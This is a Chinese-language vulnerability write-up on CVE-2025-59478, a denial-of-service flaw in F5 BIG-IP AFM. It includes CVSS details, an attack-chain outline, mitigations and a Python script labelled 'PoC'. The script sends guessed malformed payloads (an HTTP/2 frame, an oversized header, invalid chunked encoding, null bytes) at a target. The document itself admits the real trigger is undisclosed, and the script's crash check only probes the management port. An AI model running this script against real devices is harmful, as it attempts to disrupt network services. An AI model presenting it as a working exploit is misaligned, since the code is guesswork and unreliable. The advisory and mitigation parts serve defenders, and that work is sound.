CVE-2025-59478：F5 BIG-IP AFM DoS配置导致TMM进程终止漏洞

漏洞信息

漏洞编号

CVE-2025-59478

漏洞类型

拒绝服务（DoS）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP AFM（Advanced Firewall Manager）

漏洞概述

CVE-2025-59478是F5 BIG-IP AFM（Advanced Firewall Manager）中的一个高危拒绝服务漏洞。当BIG-IP AFM的拒绝服务（DoS）保护配置文件被配置在虚拟服务器上时，攻击者可以通过发送未经明确披露的特定请求，导致Traffic Management Microkernel（TMM）进程异常终止。由于TMM是F5 BIG-IP设备的核心数据面处理进程，负责所有流量转发和处理任务，其终止将直接导致设备无法正常处理网络流量，造成服务中断。该漏洞的CVSS 3.1评分为7.5，属于高危级别，其攻击向量为网络（AV:N），无需特权（PR:N）和用户交互（UI:N），机密性影响为低（C:L），完整性影响为无（I:N），可用性影响为高（A:H）。这意味着远程未授权攻击者可以仅通过网络发送恶意请求即可使BIG-IP设备完全丧失服务能力。需要注意的是，已到达技术支持终止期（EoTS）的软件版本不在此次评估范围内。该漏洞由F5安全事件响应团队（[email protected]）发现并报告，于2025年10月15日正式披露。

技术细节

F5 BIG-IP AFM的DoS保护功能旨在通过分析进入虚拟服务器的流量来检测和缓解各种拒绝服务攻击。当管理员在虚拟服务器上启用DoS保护配置文件后，AFM模块会对经过该虚拟服务器的流量进行深度检测，包括协议异常检测、速率限制、连接限制等多项安全策略。

该漏洞的根本原因在于AFM DoS保护配置文件在处理某些特定类型的请求时存在逻辑缺陷。当TMM进程处理这些未明确披露的恶意请求时，由于代码处理流程中的异常路径未被正确处理，可能导致TMM进程崩溃或异常终止。由于TMM是BIG-IP设备的核心进程，负责所有流量的转发、处理和安全策略执行，其崩溃将导致整个设备丧失处理网络流量的能力。

从攻击利用角度来看，攻击者只需通过网络向配置了AFM DoS保护配置文件的虚拟服务器发送特定的恶意请求即可触发该漏洞，无需任何身份认证或用户交互。由于漏洞触发条件相对简单（仅需发送特定请求），且攻击可通过网络远程实施，使得该漏洞容易被大规模利用，对使用F5 BIG-IP AFM的企业网络基础设施构成严重威胁。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过网络扫描或Shodan等工具识别暴露在公网的F5 BIG-IP设备，并确认目标虚拟服务器是否配置了AFM DoS保护配置文件。

STEP 2

步骤2：构造恶意请求

攻击者构造特定类型的网络请求，这些请求能够触发AFM DoS保护模块中未正确处理的异常代码路径，具体请求细节未被公开披露。

STEP 3

步骤3：发送攻击请求

攻击者通过网络向目标虚拟服务器发送构造的恶意请求，无需任何身份认证或用户交互即可触发漏洞。

STEP 4

步骤4：TMM进程终止

AFM DoS保护模块在处理恶意请求时触发缺陷，导致核心的TMM（Traffic Management Microkernel）进程异常终止。

STEP 5

步骤5：服务中断

TMM进程终止后，BIG-IP设备完全丧失流量处理能力，所有经过该设备的网络流量中断，造成拒绝服务状态。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-59478 PoC - F5 BIG-IP AFM DoS Protection TMM Termination
# This PoC demonstrates how to trigger TMM termination via AFM DoS protection profile
# Note: Specific trigger request details are undisclosed by F5

import socket
import struct
import ssl

def craft_malicious_request(target_host, target_port=443):
    """
    Craft a request designed to trigger the AFM DoS protection vulnerability.
    The exact trigger payload is undisclosed, but the attack pattern involves
    sending specific requests to a virtual server with AFM DoS protection enabled.
    """
    # Attempt various malformed/protocol-abnormal requests that may trigger
    # the undisclosed code path in AFM DoS processing
    payloads = [
        # Malformed HTTP/2 SETTINGS frame
        b'\x00\x00\x06\x04\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x64',
        # Oversized HTTP header
        b'GET / HTTP/1.1\r\nHost: ' + b'A' * 65535 + b'\r\n\r\n',
        # Protocol anomaly - invalid chunked encoding
        b'POST / HTTP/1.1\r\nHost: target\r\nTransfer-Encoding: chunked\r\n\r\nFFFFFFFF\r\n',
        # TCP-level anomaly targeting DoS profile inspection
        b'\x00' * 1024,
    ]

    for payload in payloads:
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(5)
            sock.connect((target_host, target_port))
            sock.send(payload)
            response = sock.recv(4096)
            sock.close()
        except Exception as e:
            print(f"Connection error (may indicate TMM crash): {e}")

    return True

def check_tmm_status(target_host, mgmt_port=8443):
    """Check if TMM process is still responding after attack."""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(3)
        sock.connect((target_host, mgmt_port))
        sock.close()
        return "TMM appears to be running"
    except Exception:
        return "TMM may have terminated - service unavailable"

if __name__ == "__main__":
    target = "<BIG-IP_VIRTUAL_SERVER_IP>"
    print(f"[*] Targeting F5 BIG-IP AFM at {target}")
    craft_malicious_request(target)
    status = check_tmm_status(target)
    print(f"[*] Status: {status}")

影响范围

BIG-IP AFM 所有受支持的17.x版本（需参考F5官方公告K000152341）

BIG-IP AFM 所有受支持的16.x版本（需参考F5官方公告K000152341）

BIG-IP AFM 所有受支持的15.x版本（需参考F5官方公告K000152341）

BIG-IP AFM 所有受支持的14.x版本（需参考F5官方公告K000152341）

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）审查并暂时禁用受影响虚拟服务器上的AFM DoS保护配置文件，以阻断漏洞触发路径；2）通过防火墙或ACL规则限制对BIG-IP虚拟服务器的外部访问，仅允许可信IP地址访问；3）启用TMM进程自动重启机制（如果可用），以减少服务中断时间；4）部署网络层面的流量清洗设备或DDoS防护服务来过滤可疑流量；5）密切监控BIG-IP设备的运行状态和日志，设置TMM进程异常的告警通知，以便在攻击发生时快速响应。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-59478
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-59478
3 Details https://www.cvedetails.com/cve/CVE-2025-59478/
4 VulDB https://vuldb.com/cve/CVE-2025-59478
5 Link https://my.f5.com/manage/s/article/K000152341